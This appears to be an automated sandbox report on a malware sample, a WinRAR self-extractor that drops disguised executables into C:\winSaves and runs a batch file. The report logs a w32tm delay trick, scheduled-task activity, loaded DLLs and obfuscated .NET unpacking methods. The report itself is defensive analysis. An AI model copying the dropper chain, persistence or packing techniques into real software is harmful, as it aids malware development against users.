            Source: C:\winSaves\fontsavesbroker.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vxPvY9xhrB.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\winSaves\fontsavesbroker.exe "C:\winSaves\fontsavesbroker.exe" Jump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: version.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: wldp.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: profapi.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: amsi.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: userenv.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: propsys.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: edputil.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: netutils.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: slc.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: sppc.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: version.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: wldp.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: profapi.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: version.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: wldp.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: profapi.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: mscoree.dll
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: kernel.appcore.dll
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: version.dll
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: uxtheme.dll
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: windows.storage.dll
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: wldp.dll
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: profapi.dll
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: cryptsp.dll
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: rsaenh.dll
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: cryptbase.dll
            Source: C:\winSaves\fontsavesbroker.exeSection loaded: sspicli.dll
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
            Source: j0GOUGjcJD.exeStatic file information: File size 1141873 > 1048576
            Source: j0GOUGjcJD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: j0GOUGjcJD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: j0GOUGjcJD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: j0GOUGjcJD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: j0GOUGjcJD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: j0GOUGjcJD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: j0GOUGjcJD.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: j0GOUGjcJD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: j0GOUGjcJD.exe
            Source: j0GOUGjcJD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: j0GOUGjcJD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: j0GOUGjcJD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: j0GOUGjcJD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: j0GOUGjcJD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, VEvtpDhamCVIMfRdDDD.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, VEvtpDhamCVIMfRdDDD.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            .NET source code contains potential unpacker
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, P5pBCLyC9gZ4PwvqHwd.cs.Net Code: qNl0vUOEhQ System.AppDomain.Load(byte[])
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, P5pBCLyC9gZ4PwvqHwd.cs.Net Code: qNl0vUOEhQ System.Reflection.Assembly.Load(byte[])
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, P5pBCLyC9gZ4PwvqHwd.cs.Net Code: qNl0vUOEhQ
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, P5pBCLyC9gZ4PwvqHwd.cs.Net Code: qNl0vUOEhQ System.AppDomain.Load(byte[])
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, P5pBCLyC9gZ4PwvqHwd.cs.Net Code: qNl0vUOEhQ System.Reflection.Assembly.Load(byte[])
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, P5pBCLyC9gZ4PwvqHwd.cs.Net Code: qNl0vUOEhQ
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeFile created: C:\winSaves\__tmp_rar_sfx_access_check_6481218Jump to behavior
            Source: j0GOUGjcJD.exeStatic PE information: section name: .didat
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004EE28C push eax; ret 0_2_004EE2AA
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004EED46 push ecx; ret 0_2_004EED59
            Source: C:\winSaves\fontsavesbroker.exeCode function: 4_2_00007FFD9B7800BD pushad ; iretd 4_2_00007FFD9B7800C1
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeCode function: 16_2_00007FFD9B7800BD pushad ; iretd 16_2_00007FFD9B7800C1
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeCode function: 17_2_00007FFD9B7800BD pushad ; iretd 17_2_00007FFD9B7800C1
            Source: C:\winSaves\fontsavesbroker.exeCode function: 19_2_00007FFD9B7700BD pushad ; iretd 19_2_00007FFD9B7700C1
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, YTIqJY0j1eVbrxd6IJ6.csHigh entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'Gs5lpwB24tT5HRmg4tF', 'pNJdWkBSjDZBqUYrVYl', 'Xx8DJBB4uDZ0kohW9q9', 'rtw6OpB60yuGLMMxbru'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, IrAWjbyU2j63HAZqFFN.csHigh entropy of concatenated method names: 'tOrENAWjb2', 'e6rcQyEkQ9uWFPKXcPC', 'PVQp1CEH4oHwwpBdhIA', 'vBr8YHEVvVDEZH4Sr0o', 'RsjtAEEglDTEq7BlbQ1', 'EniwZcEzFCAWGAt4PXO', 'QXFOlWG8PLRnhyCCcUu', 'UaFPEiG75qoFG77hEG9', 'XQqmJLGrKtA2fgZPGJj', 'gBtQvGGT1KDPp0cDWtt'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, DKgsCli9ZqoVswx7c1a.csHigh entropy of concatenated method names: 'gOHBSKrKia', 'NSMBU8vNJP', 'aMuB1t6jyi', 'RFZBY1c9oF', 'sxBBOtJxsV', 'IG0FRTtmMJTKM1yRgnZ', 'KrChJOthIyJfRAaPu6O', 'h2Vg38tNdYUKjdtINom', 'EaYRsdtpsTYjJUMe63j', 'Cm3qpjtfnbw2QfAPkeh'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, JYiKscikUePIgxqf9Pg.csHigh entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'mVcvrU8h0L', 'FkCvp4lqsW', 'r8j', 'LS1', '_55S'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, pVCWxx0oIogQX9AaqbX.csHigh entropy of concatenated method names: 'oYo', '_1Z5', 'Obm4h1wtaw', 'qD9Ji005Ib', 'zfe4HRfELf', 'e9SLRTu2vgdpVUDAJte', 'V3oBxxuS6x1wh7Dkc8D', 'mis1wEu4YJ8l5FiUp7v', 'HjFYKhu6PFuEaYwvxUi', 'acXUmYuEf4bH9Uh4o9Q'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, IGmJGyMXY1oqSTbfcTS.csHigh entropy of concatenated method names: 'jlkwCOSU2V', 'wEIwJyk2dK', 'RHowTltc3O', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'cPBwtr8rEk'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, ztOHKviCeBBHGCDaSuB.csHigh entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, hF1lC408DT3R9HUQKmK.csHigh entropy of concatenated method names: 'CvGH69B6fE', 'J4eHW2k2oO', 'cjcHbmnGoV', 'lHsHu3Za6n', 'f32H2nl73B', 'Pf9cjtxQECwAjHtXbGp', 'giKkAtxaMtu9SMJATlW', 'nep89AxlXxSBRPDUUHj', 'qde8dFxMvWEcTcaVuUK', 'x83Q38xFvTuT8C1oF9u'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, gxrRgMeorFXSoFDpcY7.csHigh entropy of concatenated method names: 'knIyTZ3daP', 'jXMytQGVsU', 'Xe5LOG1saUt1fYyfeYD', 'jWen5V1UnUo0GVv5Xna', 's39DVu11wZ1ZcXuGjLX', 'yw2NTF1vN959cErCm4L', 'Aq4Om812YEtcRDJ3dU9', 'cwNSMZ1S0KPtuZMqCru', 'GsViTC14dm8FIw9BRpf', 'PYoVvd16Fu3N8IHDtvX'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, mWwphpeThZ87UhTlqEp.csHigh entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'OrwE07aI6c10sVvL1uk', 'IIhyBta3OR4xMw6A3oR', 'PBj2SMaDDMHJrqu4ysT', 'UG0sNCaxNnUl7kaKXXe', 'jHBb5BaBtjWY9mQL4iN', 'EkP1H0auJbKk3UfPL4B'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, sCTOb30BtBftHsFVIBF.csHigh entropy of concatenated method names: '_223', 'DZ5Z1XDGI7hFxGiAu0u', 'J17PueDnVd2kD9kvoas', 'pCAgknDILbaEs69WuWd', 'LHZfQJD3APD3NoKhmsy', 'iuY3qWDDAFTtNZ2UgRD', 'PqDpcsDxJQalTBvpCHV', 'wAuX4MDBjrnertBpkhw', 'XF8RojDufKIGk2dmgU4', 'F0Rv8wDeXR9cWQr05is'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, tw3uV20WNb3pBo2MPoT.csHigh entropy of concatenated method names: '_269', '_5E7', 'l2L4vZC7Mn', 'Mz8', 'wdc4pr8LwU', 'US6mXBuWWyesswptFJJ', 'wwbpiXuKYM5PP9ZMpag', 'kMID2Uu5wIFtvkTfC5t', 'xVantfuJ3wh7aCaJ4je', 'oY5ut6uVeCGiDeHjANx'
